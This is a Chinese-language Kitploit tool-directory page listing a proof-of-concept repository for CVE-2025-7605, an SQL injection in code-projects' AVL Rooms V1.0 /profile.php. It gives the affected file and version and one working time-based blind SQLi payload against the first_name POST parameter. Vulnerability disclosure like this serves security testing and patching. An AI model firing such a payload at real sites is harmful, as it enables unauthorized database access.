Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-7605 — 针对 AVL Rooms V1.0 (CVE-2025-7605) 中 SQL 注入漏洞的概念验证漏洞利用代码。包含针对 /profile.php 端点的基于时间的盲注有效载荷。 | Kitploit
工具/GitHubGitHub/sunhuihi666/cve-2025-7605
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试
GitHubsunhuihi666/cve-2025-7605

CVE-2025-7605

针对 AVL Rooms V1.0 (CVE-2025-7605) 中 SQL 注入漏洞的概念验证漏洞利用代码。包含针对 /profile.php 端点的基于时间的盲注有效载荷。

查看仓库
1年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-7605

code-projects AVL Rooms Project V1.0/profile.php SQL注入

受影响产品名称

AVL Rooms

供应商主页

https://code-projects.org/avl-rooms-in-php-css-javascript-and-mysql-free-download/

提交者

dazhi

漏洞文件

/profile.php

版本

V1.0

软件链接

https://code-projects.org/avl-rooms-in-php-css-javascript-and-mysql-free-download/

Payload:


参数:first_name (POST)
类型:基于时间的盲注
标题:MySQL >= 5.0.12 且基于时间的盲注(查询 SLEEP)
Payload: first_name=1111' AND (SELECT 9037 FROM (SELECT(SLEEP(5)))RgOn) AND 'Tnsa'='Tnsa&last_name=1111&[email protected]&mobile_number=1111111111&city=11&state=11&action=

下载工具